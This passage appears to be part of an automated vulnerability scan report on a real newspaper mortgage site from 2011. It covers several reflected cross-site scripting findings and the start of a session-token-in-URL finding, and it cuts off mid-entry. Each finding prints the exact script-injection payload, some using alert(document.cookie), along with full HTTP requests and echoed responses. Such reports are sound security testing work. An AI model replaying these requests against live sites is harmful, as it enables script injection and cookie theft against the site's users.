Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
el="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724\"><script>alert(1)</script>5a15440a445=1feed/" />
...[SNIP]...

1.185. http://mortgage.ocregister.com/files [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /files

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7804f"><script>alert(1)</script>b31526e044f was submitted in the REST URL parameter 1. This input was echoed as 7804f\"><script>alert(1)</script>b31526e044f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files7804f"><script>alert(1)</script>b31526e044f HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files7804f\"><script>alert(1)</script>b31526e044ffeed/" />
...[SNIP]...

1.186. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /files

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcea"><script>alert(1)</script>d63783f7e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bcea\"><script>alert(1)</script>d63783f7e5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files?3bcea"><script>alert(1)</script>d63783f7e5a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files?3bcea\"><script>alert(1)</script>d63783f7e5a=1feed/" />
...[SNIP]...

1.187. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f7c"><script>alert(1)</script>5e4882fdc7d was submitted in the REST URL parameter 1. This input was echoed as 12f7c\"><script>alert(1)</script>5e4882fdc7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.012f7c"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.012f7c\"><script>alert(1)</script>5e4882fdc7d/Content/dmhotlinks.cssfeed/" />
...[SNIP]...

1.188. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b7a"><script>alert(1)</script>df3c8a873d1 was submitted in the REST URL parameter 2. This input was echoed as 17b7a\"><script>alert(1)</script>df3c8a873d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content17b7a"><script>alert(1)</script>df3c8a873d1/dmhotlinks.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content17b7a\"><script>alert(1)</script>df3c8a873d1/dmhotlinks.cssfeed/" />
...[SNIP]...

1.189. http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /ver1.0/Content/dmhotlinks.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92232"><script>alert(1)</script>8606eb47764 was submitted in the REST URL parameter 3. This input was echoed as 92232\"><script>alert(1)</script>8606eb47764 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Content/dmhotlinks.css92232"><script>alert(1)</script>8606eb47764 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css92232\"><script>alert(1)</script>8606eb47764feed/" />
...[SNIP]...

1.190. http://mortgage.ocregister.com/wp-content/plugins/democracy/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d1"><script>alert(1)</script>8572d6a55e6 was submitted in the REST URL parameter 1. This input was echoed as 766d1\"><script>alert(1)</script>8572d6a55e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /766d1"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/766d1\"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.cssfeed/" />
...[SNIP]...

1.191. http://mortgage.ocregister.com/wp-content/plugins/democracy/democracy.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/democracy.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1fb8"><script>alert(1)</script>a22401a108a was submitted in the REST URL parameter 1. This input was echoed as e1fb8\"><script>alert(1)</script>a22401a108a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e1fb8"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.js HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/e1fb8\"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.jsfeed/" />
...[SNIP]...

1.192. http://mortgage.ocregister.com/wp-content/plugins/democracy/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf114"><script>alert(1)</script>95836e536ce was submitted in the REST URL parameter 1. This input was echoed as cf114\"><script>alert(1)</script>95836e536ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cf114"><script>alert(1)</script>95836e536ce/plugins/democracy/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/cf114\"><script>alert(1)</script>95836e536ce/plugins/democracy/style.cssfeed/" />
...[SNIP]...

1.193. http://mortgage.ocregister.com/wp-content/themes/onSet/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/themes/onSet/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62930"><script>alert(1)</script>7b7b2ccc4d6 was submitted in the REST URL parameter 1. This input was echoed as 62930\"><script>alert(1)</script>7b7b2ccc4d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /62930"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/62930\"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.cssfeed/" />
...[SNIP]...

1.194. http://mortgage.ocregister.com/wp-includes/js/swfobject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7f3"><script>alert(1)</script>dcab4cc6610 was submitted in the REST URL parameter 1. This input was echoed as ce7f3\"><script>alert(1)</script>dcab4cc6610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ce7f3"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ce7f3\"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2feed/" />
...[SNIP]...

1.195. http://mortgage.ocregister.com/wp-includes/wlwmanifest.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-includes/wlwmanifest.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f534"><script>alert(1)</script>e883ec4e0ce was submitted in the REST URL parameter 1. This input was echoed as 3f534\"><script>alert(1)</script>e883ec4e0ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3f534"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xml HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/3f534\"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xmlfeed/" />
...[SNIP]...

1.196. http://mortgage.ocregister.com/xmlrpc.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86904"><script>alert(1)</script>1d2a8825119 was submitted in the REST URL parameter 1. This input was echoed as 86904\"><script>alert(1)</script>1d2a8825119 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.php86904"><script>alert(1)</script>1d2a8825119?rsd HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/xmlrpc.php86904\"><script>alert(1)</script>1d2a8825119?rsdfeed/" />
...[SNIP]...

2. Session token in URL
There are 65 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


2.1. http://mortgage.ocregister.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
